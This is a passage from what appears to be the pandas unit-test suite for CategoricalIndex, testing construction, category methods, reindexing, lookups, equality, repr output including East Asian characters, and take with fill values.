tm.assert_index_equal(result.categories, Index(list('ab')))
tm.assert_numpy_array_equal(result.codes,
np.array([0, 0, 1,
1, -1, 0], dtype='int8'))
assert not result.ordered
result = CategoricalIndex(ci, categories=list('ab'), ordered=True)
tm.assert_index_equal(result.categories, Index(list('ab')))
tm.assert_numpy_array_equal(result.codes,
np.array([0, 0, 1,
1, -1, 0], dtype='int8'))
assert result.ordered
result = pd.CategoricalIndex(ci, categories=list('ab'), ordered=True)
expected = pd.CategoricalIndex(ci, categories=list('ab'), ordered=True,
dtype='category')
tm.assert_index_equal(result, expected, exact=True)
# turn me to an Index
result = Index(np.array(ci))
assert isinstance(result, Index)
assert not isinstance(result, CategoricalIndex)
def test_construction_with_dtype(self):
# specify dtype
ci = self.create_index(categories=list('abc'))
result = Index(np.array(ci), dtype='category')
tm.assert_index_equal(result, ci, exact=True)
result = Index(np.array(ci).tolist(), dtype='category')
tm.assert_index_equal(result, ci, exact=True)
# these are generally only equal when the categories are reordered
ci = self.create_index()
result = Index(
np.array(ci), dtype='category').reorder_categories(ci.categories)
tm.assert_index_equal(result, ci, exact=True)
# make sure indexes are handled
expected = CategoricalIndex([0, 1, 2], categories=[0, 1, 2],
ordered=True)
idx = Index(range(3))
result = CategoricalIndex(idx, categories=idx, ordered=True)
tm.assert_index_equal(result, expected, exact=True)
def test_construction_with_categorical_dtype(self):
# construction with CategoricalDtype
# GH18109
data, cats, ordered = 'a a b b'.split(), 'c b a'.split(), True
dtype = CategoricalDtype(categories=cats, ordered=ordered)
result = pd.CategoricalIndex(data, dtype=dtype)
expected = pd.CategoricalIndex(data, categories=cats,
ordered=ordered)
tm.assert_index_equal(result, expected, exact=True)
# error to combine categories or ordered and dtype keywords args
with pytest.raises(ValueError, match="Cannot specify both `dtype` and "
"`categories` or `ordered`."):
pd.CategoricalIndex(data, categories=cats, dtype=dtype)
with pytest.raises(ValueError, match="Cannot specify both `dtype` and "
"`categories` or `ordered`."):
pd.CategoricalIndex(data, ordered=ordered, dtype=dtype)
def test_create_categorical(self):
# https://github.com/pandas-dev/pandas/pull/17513
# The public CI constructor doesn't hit this code path with
# instances of CategoricalIndex, but we still want to test the code
ci = CategoricalIndex(['a', 'b', 'c'])
# First ci is self, second ci is data.
result = CategoricalIndex._create_categorical(ci, ci)
expected = Categorical(['a', 'b', 'c'])
tm.assert_categorical_equal(result, expected)
def test_disallow_set_ops(self):
# GH 10039
# set ops (+/-) raise TypeError
idx = pd.Index(pd.Categorical(['a', 'b']))
pytest.raises(TypeError, lambda: idx - idx)
pytest.raises(TypeError, lambda: idx + idx)
pytest.raises(TypeError, lambda: idx - ['a', 'b'])
pytest.raises(TypeError, lambda: idx + ['a', 'b'])
pytest.raises(TypeError, lambda: ['a', 'b'] - idx)
pytest.raises(TypeError, lambda: ['a', 'b'] + idx)
def test_method_delegation(self):
ci = CategoricalIndex(list('aabbca'), categories=list('cabdef'))
result = ci.set_categories(list('cab'))
tm.assert_index_equal(result, CategoricalIndex(
list('aabbca'), categories=list('cab')))
ci = CategoricalIndex(list('aabbca'), categories=list('cab'))
result = ci.rename_categories(list('efg'))
tm.assert_index_equal(result, CategoricalIndex(
list('ffggef'), categories=list('efg')))
# GH18862 (let rename_categories take callables)
result = ci.rename_categories(lambda x: x.upper())
tm.assert_index_equal(result, CategoricalIndex(
list('AABBCA'), categories=list('CAB')))
ci = CategoricalIndex(list('aabbca'), categories=list('cab'))
result = ci.add_categories(['d'])
tm.assert_index_equal(result, CategoricalIndex(
list('aabbca'), categories=list('cabd')))
ci = CategoricalIndex(list('aabbca'), categories=list('cab'))
result = ci.remove_categories(['c'])
tm.assert_index_equal(result, CategoricalIndex(
list('aabb') + [np.nan] + ['a'], categories=list('ab')))
ci = CategoricalIndex(list('aabbca'), categories=list('cabdef'))
result = ci.as_unordered()
tm.assert_index_equal(result, ci)
ci = CategoricalIndex(list('aabbca'), categories=list('cabdef'))
result = ci.as_ordered()
tm.assert_index_equal(result, CategoricalIndex(
list('aabbca'), categories=list('cabdef'), ordered=True))
# invalid
pytest.raises(ValueError, lambda: ci.set_categories(
list('cab'), inplace=True))
def test_contains(self):
ci = self.create_index(categories=list('cabdef'))
assert 'a' in ci
assert 'z' not in ci
assert 'e' not in ci
assert np.nan not in ci
# assert codes NOT in index
assert 0 not in ci
assert 1 not in ci
ci = CategoricalIndex(
list('aabbca') + [np.nan], categories=list('cabdef'))
assert np.nan in ci
def test_min_max(self):
ci = self.create_index(ordered=False)
pytest.raises(TypeError, lambda: ci.min())
pytest.raises(TypeError, lambda: ci.max())
ci = self.create_index(ordered=True)
assert ci.min() == 'c'
assert ci.max() == 'b'
def test_map(self):
ci = pd.CategoricalIndex(list('ABABC'), categories=list('CBA'),
ordered=True)
result = ci.map(lambda x: x.lower())
exp = pd.CategoricalIndex(list('ababc'), categories=list('cba'),
ordered=True)
tm.assert_index_equal(result, exp)
ci = pd.CategoricalIndex(list('ABABC'), categories=list('BAC'),
ordered=False, name='XXX')
result = ci.map(lambda x: x.lower())
exp = pd.CategoricalIndex(list('ababc'), categories=list('bac'),
ordered=False, name='XXX')
tm.assert_index_equal(result, exp)
# GH 12766: Return an index not an array
tm.assert_index_equal(ci.map(lambda x: 1),
Index(np.array([1] * 5, dtype=np.int64),
name='XXX'))
# change categories dtype
ci = pd.CategoricalIndex(list('ABABC'), categories=list('BAC'),
ordered=False)
def f(x):
return {'A': 10, 'B': 20, 'C': 30}.get(x)
result = ci.map(f)
exp = pd.CategoricalIndex([10, 20, 10, 20, 30],
categories=[20, 10, 30],
ordered=False)
tm.assert_index_equal(result, exp)
result = ci.map(pd.Series([10, 20, 30], index=['A', 'B', 'C']))
tm.assert_index_equal(result, exp)
result = ci.map({'A': 10, 'B': 20, 'C': 30})
tm.assert_index_equal(result, exp)
def test_map_with_categorical_series(self):
# GH 12756
a = pd.Index([1, 2, 3, 4])
b = pd.Series(["even", "odd", "even", "odd"],
dtype="category")
c = pd.Series(["even", "odd", "even", "odd"])
exp = CategoricalIndex(["odd", "even", "odd", np.nan])
tm.assert_index_equal(a.map(b), exp)
exp = pd.Index(["odd", "even", "odd", np.nan])
tm.assert_index_equal(a.map(c), exp)
@pytest.mark.parametrize('klass', [list, tuple, np.array, pd.Series])
def test_where(self, klass):
i = self.create_index()
cond = [True] * len(i)
expected = i
result = i.where(klass(cond))
tm.assert_index_equal(result, expected)
cond = [False] + [True] * (len(i) - 1)
expected = CategoricalIndex([np.nan] + i[1:].tolist(),
categories=i.categories)
result = i.where(klass(cond))
tm.assert_index_equal(result, expected)
def test_append(self):
ci = self.create_index()
categories = ci.categories
# append cats with the same categories
result = ci[:3].append(ci[3:])
tm.assert_index_equal(result, ci, exact=True)
foos = [ci[:1], ci[1:3], ci[3:]]
result = foos[0].append(foos[1:])
tm.assert_index_equal(result, ci, exact=True)
# empty
result = ci.append([])
tm.assert_index_equal(result, ci, exact=True)
# appending with different categories or reoreded is not ok
pytest.raises(
TypeError,
lambda: ci.append(ci.values.set_categories(list('abcd'))))
pytest.raises(
TypeError,
lambda: ci.append(ci.values.reorder_categories(list('abc'))))
# with objects
result = ci.append(Index(['c', 'a']))
expected = CategoricalIndex(list('aabbcaca'), categories=categories)
tm.assert_index_equal(result, expected, exact=True)
# invalid objects
pytest.raises(TypeError, lambda: ci.append(Index(['a', 'd'])))
# GH14298 - if base object is not categorical -> coerce to object
result = Index(['c', 'a']).append(ci)
expected = Index(list('caaabbca'))
tm.assert_index_equal(result, expected, exact=True)
def test_insert(self):
ci = self.create_index()
categories = ci.categories
# test 0th element
result = ci.insert(0, 'a')
expected = CategoricalIndex(list('aaabbca'), categories=categories)
tm.assert_index_equal(result, expected, exact=True)
# test Nth element that follows Python list behavior
result = ci.insert(-1, 'a')
expected = CategoricalIndex(list('aabbcaa'), categories=categories)
tm.assert_index_equal(result, expected, exact=True)
# test empty
result = CategoricalIndex(categories=categories).insert(0, 'a')
expected = CategoricalIndex(['a'], categories=categories)
tm.assert_index_equal(result, expected, exact=True)
# invalid
pytest.raises(TypeError, lambda: ci.insert(0, 'd'))
# GH 18295 (test missing)
expected = CategoricalIndex(['a', np.nan, 'a', 'b', 'c', 'b'])
for na in (np.nan, pd.NaT, None):
result = CategoricalIndex(list('aabcb')).insert(1, na)
tm.assert_index_equal(result, expected)
def test_delete(self):
ci = self.create_index()
categories = ci.categories
result = ci.delete(0)
expected = CategoricalIndex(list('abbca'), categories=categories)
tm.assert_index_equal(result, expected, exact=True)
result = ci.delete(-1)
expected = CategoricalIndex(list('aabbc'), categories=categories)
tm.assert_index_equal(result, expected, exact=True)
with pytest.raises((IndexError, ValueError)):
# Either depending on NumPy version
ci.delete(10)
def test_astype(self):
ci = self.create_index()
result = ci.astype(object)
tm.assert_index_equal(result, Index(np.array(ci)))
# this IS equal, but not the same class
assert result.equals(ci)
assert isinstance(result, Index)
assert not isinstance(result, CategoricalIndex)
# interval
ii = IntervalIndex.from_arrays(left=[-0.001, 2.0],
right=[2, 4],
closed='right')
ci = CategoricalIndex(Categorical.from_codes(
[0, 1, -1], categories=ii, ordered=True))
result = ci.astype('interval')
expected = ii.take([0, 1, -1])
tm.assert_index_equal(result, expected)
result = IntervalIndex.from_intervals(result.values)
tm.assert_index_equal(result, expected)
@pytest.mark.parametrize('name', [None, 'foo'])
@pytest.mark.parametrize('dtype_ordered', [True, False])
@pytest.mark.parametrize('index_ordered', [True, False])
def test_astype_category(self, name, dtype_ordered, index_ordered):
# GH 18630
index = self.create_index(ordered=index_ordered)
if name:
index = index.rename(name)
# standard categories
dtype = CategoricalDtype(ordered=dtype_ordered)
result = index.astype(dtype)
expected = CategoricalIndex(index.tolist(),
name=name,
categories=index.categories,
ordered=dtype_ordered)
tm.assert_index_equal(result, expected)
# non-standard categories
dtype = CategoricalDtype(index.unique().tolist()[:-1], dtype_ordered)
result = index.astype(dtype)
expected = CategoricalIndex(index.tolist(), name=name, dtype=dtype)
tm.assert_index_equal(result, expected)
if dtype_ordered is False:
# dtype='category' can't specify ordered, so only test once
result = index.astype('category')
expected = index
tm.assert_index_equal(result, expected)
def test_reindex_base(self):
# Determined by cat ordering.
idx = CategoricalIndex(list("cab"), categories=list("cab"))
expected = np.arange(len(idx), dtype=np.intp)
actual = idx.get_indexer(idx)
tm.assert_numpy_array_equal(expected, actual)
with tm.assert_raises_regex(ValueError, "Invalid fill method"):
idx.get_indexer(idx, method="invalid")
def test_reindexing(self):
np.random.seed(123456789)
ci = self.create_index()
oidx = Index(np.array(ci))
for n in [1, 2, 5, len(ci)]:
finder = oidx[np.random.randint(0, len(ci), size=n)]
expected = oidx.get_indexer_non_unique(finder)[0]
actual = ci.get_indexer(finder)
tm.assert_numpy_array_equal(expected, actual)
# see gh-17323
#
# Even when indexer is equal to the
# members in the index, we should
# respect duplicates instead of taking
# the fast-track path.
for finder in [list("aabbca"), list("aababca")]:
expected = oidx.get_indexer_non_unique(finder)[0]
actual = ci.get_indexer(finder)
tm.assert_numpy_array_equal(expected, actual)
def test_reindex_dtype(self):
c = CategoricalIndex(['a', 'b', 'c', 'a'])
res, indexer = c.reindex(['a', 'c'])
tm.assert_index_equal(res, Index(['a', 'a', 'c']), exact=True)
tm.assert_numpy_array_equal(indexer,
np.array([0, 3, 2], dtype=np.intp))
c = CategoricalIndex(['a', 'b', 'c', 'a'])
res, indexer = c.reindex(Categorical(['a', 'c']))
exp = CategoricalIndex(['a', 'a', 'c'], categories=['a', 'c'])
tm.assert_index_equal(res, exp, exact=True)
tm.assert_numpy_array_equal(indexer,
np.array([0, 3, 2], dtype=np.intp))
c = CategoricalIndex(['a', 'b', 'c', 'a'],
categories=['a', 'b', 'c', 'd'])
res, indexer = c.reindex(['a', 'c'])
exp = Index(['a', 'a', 'c'], dtype='object')
tm.assert_index_equal(res, exp, exact=True)
tm.assert_numpy_array_equal(indexer,
np.array([0, 3, 2], dtype=np.intp))
c = CategoricalIndex(['a', 'b', 'c', 'a'],
categories=['a', 'b', 'c', 'd'])
res, indexer = c.reindex(Categorical(['a', 'c']))
exp = CategoricalIndex(['a', 'a', 'c'], categories=['a', 'c'])
tm.assert_index_equal(res, exp, exact=True)
tm.assert_numpy_array_equal(indexer,
np.array([0, 3, 2], dtype=np.intp))
def test_reindex_empty_index(self):
# See GH16770
c = CategoricalIndex([])
res, indexer = c.reindex(['a', 'b'])
tm.assert_index_equal(res, Index(['a', 'b']), exact=True)
tm.assert_numpy_array_equal(indexer,
np.array([-1, -1], dtype=np.intp))
def test_is_monotonic(self):
c = CategoricalIndex([1, 2, 3])
assert c.is_monotonic_increasing
assert not c.is_monotonic_decreasing
c = CategoricalIndex([1, 2, 3], ordered=True)
assert c.is_monotonic_increasing
assert not c.is_monotonic_decreasing
c = CategoricalIndex([1, 2, 3], categories=[3, 2, 1])
assert not c.is_monotonic_increasing
assert c.is_monotonic_decreasing
c = CategoricalIndex([1, 3, 2], categories=[3, 2, 1])
assert not c.is_monotonic_increasing
assert not c.is_monotonic_decreasing
c = CategoricalIndex([1, 2, 3], categories=[3, 2, 1], ordered=True)
assert not c.is_monotonic_increasing
assert c.is_monotonic_decreasing
# non lexsorted categories
categories = [9, 0, 1, 2, 3]
c = CategoricalIndex([9, 0], categories=categories)
assert c.is_monotonic_increasing
assert not c.is_monotonic_decreasing
c = CategoricalIndex([0, 1], categories=categories)
assert c.is_monotonic_increasing
assert not c.is_monotonic_decreasing
def test_duplicates(self):
idx = CategoricalIndex([0, 0, 0], name='foo')
assert not idx.is_unique
assert idx.has_duplicates
expected = CategoricalIndex([0], name='foo')
tm.assert_index_equal(idx.drop_duplicates(), expected)
tm.assert_index_equal(idx.unique(), expected)
def test_get_indexer(self):
idx1 = CategoricalIndex(list('aabcde'), categories=list('edabc'))
idx2 = CategoricalIndex(list('abf'))
for indexer in [idx2, list('abf'), Index(list('abf'))]:
r1 = idx1.get_indexer(idx2)
assert_almost_equal(r1, np.array([0, 1, 2, -1], dtype=np.intp))
pytest.raises(NotImplementedError,
lambda: idx2.get_indexer(idx1, method='pad'))
pytest.raises(NotImplementedError,
lambda: idx2.get_indexer(idx1, method='backfill'))
pytest.raises(NotImplementedError,
lambda: idx2.get_indexer(idx1, method='nearest'))
def test_get_loc(self):
# GH 12531
cidx1 = CategoricalIndex(list('abcde'), categories=list('edabc'))
idx1 = Index(list('abcde'))
assert cidx1.get_loc('a') == idx1.get_loc('a')
assert cidx1.get_loc('e') == idx1.get_loc('e')
for i in [cidx1, idx1]:
with pytest.raises(KeyError):
i.get_loc('NOT-EXIST')
# non-unique
cidx2 = CategoricalIndex(list('aacded'), categories=list('edabc'))
idx2 = Index(list('aacded'))
# results in bool array
res = cidx2.get_loc('d')
tm.assert_numpy_array_equal(res, idx2.get_loc('d'))
tm.assert_numpy_array_equal(res, np.array([False, False, False,
True, False, True]))
# unique element results in scalar
res = cidx2.get_loc('e')
assert res == idx2.get_loc('e')
assert res == 4
for i in [cidx2, idx2]:
with pytest.raises(KeyError):
i.get_loc('NOT-EXIST')
# non-unique, slicable
cidx3 = CategoricalIndex(list('aabbb'), categories=list('abc'))
idx3 = Index(list('aabbb'))
# results in slice
res = cidx3.get_loc('a')
assert res == idx3.get_loc('a')
assert res == slice(0, 2, None)
res = cidx3.get_loc('b')
assert res == idx3.get_loc('b')
assert res == slice(2, 5, None)
for i in [cidx3, idx3]:
with pytest.raises(KeyError):
i.get_loc('c')
def test_repr_roundtrip(self):
ci = CategoricalIndex(['a', 'b'], categories=['a', 'b'], ordered=True)
str(ci)
tm.assert_index_equal(eval(repr(ci)), ci, exact=True)
# formatting
if PY3:
str(ci)
else:
compat.text_type(ci)
# long format
# this is not reprable
ci = CategoricalIndex(np.random.randint(0, 5, size=100))
if PY3:
str(ci)
else:
compat.text_type(ci)
def test_isin(self):
ci = CategoricalIndex(
list('aabca') + [np.nan], categories=['c', 'a', 'b'])
tm.assert_numpy_array_equal(
ci.isin(['c']),
np.array([False, False, False, True, False, False]))
tm.assert_numpy_array_equal(
ci.isin(['c', 'a', 'b']), np.array([True] * 5 + [False]))
tm.assert_numpy_array_equal(
ci.isin(['c', 'a', 'b', np.nan]), np.array([True] * 6))
# mismatched categorical -> coerced to ndarray so doesn't matter
result = ci.isin(ci.set_categories(list('abcdefghi')))
expected = np.array([True] * 6)
tm.assert_numpy_array_equal(result, expected)
result = ci.isin(ci.set_categories(list('defghi')))
expected = np.array([False] * 5 + [True])
tm.assert_numpy_array_equal(result, expected)
def test_identical(self):
ci1 = CategoricalIndex(['a', 'b'], categories=['a', 'b'], ordered=True)
ci2 = CategoricalIndex(['a', 'b'], categories=['a', 'b', 'c'],
ordered=True)
assert ci1.identical(ci1)
assert ci1.identical(ci1.copy())
assert not ci1.identical(ci2)
def test_ensure_copied_data(self):
# gh-12309: Check the "copy" argument of each
# Index.__new__ is honored.
#
# Must be tested separately from other indexes because
# self.value is not an ndarray.
_base = lambda ar: ar if ar.base is None else ar.base
for index in self.indices.values():
result = CategoricalIndex(index.values, copy=True)
tm.assert_index_equal(index, result)
assert _base(index.values) is not _base(result.values)
result = CategoricalIndex(index.values, copy=False)
assert _base(index.values) is _base(result.values)
def test_equals_categorical(self):
ci1 = CategoricalIndex(['a', 'b'], categories=['a', 'b'], ordered=True)
ci2 = CategoricalIndex(['a', 'b'], categories=['a', 'b', 'c'],
ordered=True)
assert ci1.equals(ci1)
assert not ci1.equals(ci2)
assert ci1.equals(ci1.astype(object))
assert ci1.astype(object).equals(ci1)
assert (ci1 == ci1).all()
assert not (ci1 != ci1).all()
assert not (ci1 > ci1).all()
assert not (ci1 < ci1).all()
assert (ci1 <= ci1).all()
assert (ci1 >= ci1).all()
assert not (ci1 == 1).all()
assert (ci1 == Index(['a', 'b'])).all()
assert (ci1 == ci1.values).all()
# invalid comparisons
with tm.assert_raises_regex(ValueError, "Lengths must match"):
ci1 == Index(['a', 'b', 'c'])
pytest.raises(TypeError, lambda: ci1 == ci2)
pytest.raises(
TypeError, lambda: ci1 == Categorical(ci1.values, ordered=False))
pytest.raises(
TypeError,
lambda: ci1 == Categorical(ci1.values, categories=list('abc')))
# tests
# make sure that we are testing for category inclusion properly
ci = CategoricalIndex(list('aabca'), categories=['c', 'a', 'b'])
assert not ci.equals(list('aabca'))
# Same categories, but different order
# Unordered
assert ci.equals(CategoricalIndex(list('aabca')))
# Ordered
assert not ci.equals(CategoricalIndex(list('aabca'), ordered=True))
assert ci.equals(ci.copy())
ci = CategoricalIndex(list('aabca') + [np.nan],
categories=['c', 'a', 'b'])
assert not ci.equals(list('aabca'))
assert not ci.equals(CategoricalIndex(list('aabca')))
assert ci.equals(ci.copy())
ci = CategoricalIndex(list('aabca') + [np.nan],
categories=['c', 'a', 'b'])
assert not ci.equals(list('aabca') + [np.nan])
assert ci.equals(CategoricalIndex(list('aabca') + [np.nan]))
assert not ci.equals(CategoricalIndex(list('aabca') + [np.nan],
ordered=True))
assert ci.equals(ci.copy())
def test_string_categorical_index_repr(self):
# short
idx = pd.CategoricalIndex(['a', 'bb', 'ccc'])
if PY3:
expected = u"""CategoricalIndex(['a', 'bb', 'ccc'], categories=['a', 'bb', 'ccc'], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'a', u'bb', u'ccc'], categories=[u'a', u'bb', u'ccc'], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# multiple lines
idx = pd.CategoricalIndex(['a', 'bb', 'ccc'] * 10)
if PY3:
expected = u"""CategoricalIndex(['a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a',
'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb',
'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc'],
categories=['a', 'bb', 'ccc'], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'a', u'bb', u'ccc', u'a', u'bb', u'ccc', u'a', u'bb',
u'ccc', u'a', u'bb', u'ccc', u'a', u'bb', u'ccc', u'a',
u'bb', u'ccc', u'a', u'bb', u'ccc', u'a', u'bb', u'ccc',
u'a', u'bb', u'ccc', u'a', u'bb', u'ccc'],
categories=[u'a', u'bb', u'ccc'], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# truncated
idx = pd.CategoricalIndex(['a', 'bb', 'ccc'] * 100)
if PY3:
expected = u"""CategoricalIndex(['a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a',
...
'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc', 'a', 'bb', 'ccc'],
categories=['a', 'bb', 'ccc'], ordered=False, dtype='category', length=300)""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'a', u'bb', u'ccc', u'a', u'bb', u'ccc', u'a', u'bb',
u'ccc', u'a',
...
u'ccc', u'a', u'bb', u'ccc', u'a', u'bb', u'ccc', u'a',
u'bb', u'ccc'],
categories=[u'a', u'bb', u'ccc'], ordered=False, dtype='category', length=300)""" # noqa
assert unicode(idx) == expected
# larger categories
idx = pd.CategoricalIndex(list('abcdefghijklmmo'))
if PY3:
expected = u"""CategoricalIndex(['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l',
'm', 'm', 'o'],
categories=['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', ...], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'a', u'b', u'c', u'd', u'e', u'f', u'g', u'h', u'i', u'j',
u'k', u'l', u'm', u'm', u'o'],
categories=[u'a', u'b', u'c', u'd', u'e', u'f', u'g', u'h', ...], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# short
idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'])
if PY3:
expected = u"""CategoricalIndex(['あ', 'いい', 'ううう'], categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう'], categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# multiple lines
idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'] * 10)
if PY3:
expected = u"""CategoricalIndex(['あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ',
'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい',
'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう'],
categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい',
u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう',
u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう'],
categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# truncated
idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'] * 100)
if PY3:
expected = u"""CategoricalIndex(['あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ',
...
'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう'],
categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category', length=300)""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい',
u'ううう', u'あ',
...
u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう'],
categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category', length=300)""" # noqa
assert unicode(idx) == expected
# larger categories
idx = pd.CategoricalIndex(list(u'あいうえおかきくけこさしすせそ'))
if PY3:
expected = u"""CategoricalIndex(['あ', 'い', 'う', 'え', 'お', 'か', 'き', 'く', 'け', 'こ', 'さ', 'し',
'す', 'せ', 'そ'],
categories=['あ', 'い', 'う', 'え', 'お', 'か', 'き', 'く', ...], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'い', u'う', u'え', u'お', u'か', u'き', u'く', u'け', u'こ',
u'さ', u'し', u'す', u'せ', u'そ'],
categories=[u'あ', u'い', u'う', u'え', u'お', u'か', u'き', u'く', ...], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# Emable Unicode option -----------------------------------------
with cf.option_context('display.unicode.east_asian_width', True):
# short
idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'])
if PY3:
expected = u"""CategoricalIndex(['あ', 'いい', 'ううう'], categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう'], categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# multiple lines
idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'] * 10)
if PY3:
expected = u"""CategoricalIndex(['あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい',
'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう',
'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい',
'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう'],
categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう', u'あ', u'いい', u'ううう'],
categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
# truncated
idx = pd.CategoricalIndex([u'あ', u'いい', u'ううう'] * 100)
if PY3:
expected = u"""CategoricalIndex(['あ', 'いい', 'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい',
'ううう', 'あ',
...
'ううう', 'あ', 'いい', 'ううう', 'あ', 'いい', 'ううう',
'あ', 'いい', 'ううう'],
categories=['あ', 'いい', 'ううう'], ordered=False, dtype='category', length=300)""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'いい', u'ううう', u'あ', u'いい', u'ううう', u'あ',
u'いい', u'ううう', u'あ',
...
u'ううう', u'あ', u'いい', u'ううう', u'あ', u'いい',
u'ううう', u'あ', u'いい', u'ううう'],
categories=[u'あ', u'いい', u'ううう'], ordered=False, dtype='category', length=300)""" # noqa
assert unicode(idx) == expected
# larger categories
idx = pd.CategoricalIndex(list(u'あいうえおかきくけこさしすせそ'))
if PY3:
expected = u"""CategoricalIndex(['あ', 'い', 'う', 'え', 'お', 'か', 'き', 'く', 'け', 'こ',
'さ', 'し', 'す', 'せ', 'そ'],
categories=['あ', 'い', 'う', 'え', 'お', 'か', 'き', 'く', ...], ordered=False, dtype='category')""" # noqa
assert repr(idx) == expected
else:
expected = u"""CategoricalIndex([u'あ', u'い', u'う', u'え', u'お', u'か', u'き', u'く',
u'け', u'こ', u'さ', u'し', u'す', u'せ', u'そ'],
categories=[u'あ', u'い', u'う', u'え', u'お', u'か', u'き', u'く', ...], ordered=False, dtype='category')""" # noqa
assert unicode(idx) == expected
def test_fillna_categorical(self):
# GH 11343
idx = CategoricalIndex([1.0, np.nan, 3.0, 1.0], name='x')
# fill by value in categories
exp = CategoricalIndex([1.0, 1.0, 3.0, 1.0], name='x')
tm.assert_index_equal(idx.fillna(1.0), exp)
# fill by value not in categories raises ValueError
with tm.assert_raises_regex(ValueError,
'fill value must be in categories'):
idx.fillna(2.0)
def test_take_fill_value(self):
# GH 12631
# numeric category
idx = pd.CategoricalIndex([1, 2, 3], name='xxx')
result = idx.take(np.array([1, 0, -1]))
expected = pd.CategoricalIndex([2, 1, 3], name='xxx')
tm.assert_index_equal(result, expected)
tm.assert_categorical_equal(result.values, expected.values)
# fill_value
result = idx.take(np.array([1, 0, -1]), fill_value=True)
expected = pd.CategoricalIndex([2, 1, np.nan], categories=[1, 2, 3],
name='xxx')
tm.assert_index_equal(result, expected)
tm.assert_categorical_equal(result.values, expected.values)
# allow_fill=False
result = idx.take(np.array([1, 0, -1]), allow_fill=False,
fill_value=True)
expected = pd.CategoricalIndex([2, 1, 3], name='xxx')
tm.assert_index_equal(result, expected)
tm.assert_categorical_equal(result.values, expected.values)
# object category
idx = pd.CategoricalIndex(list('CBA'), categories=list('ABC'),
ordered=True, name='xxx')
result = idx.take(np.array([1, 0, -1]))
expected = pd.CategoricalIndex(list('BCA'), categories=list('ABC'),
ordered=True, name='xxx')
tm.assert_index_equal(result, expected)
tm.assert_categorical_equal(result.values, expected.values)
# fill_value
result = idx.take(np.array([1, 0, -1]), fill_value=True)
expected = pd.CategoricalIndex(['B', 'C', np.nan],
categories=list('ABC'), ordered=True,
name='xxx')
tm.assert_index_equal(result, expected)
tm.assert_categorical_equal(result.values, expected.values)
# allow_fill=False
result = idx.take(np.array([1, 0, -1]), allow_fill=False,
fill_value=True)
expected = pd.CategoricalIndex(list('BCA'), categories=list('ABC'),
ordered=True, name='xxx')
tm.assert_index_equal(result, expected)
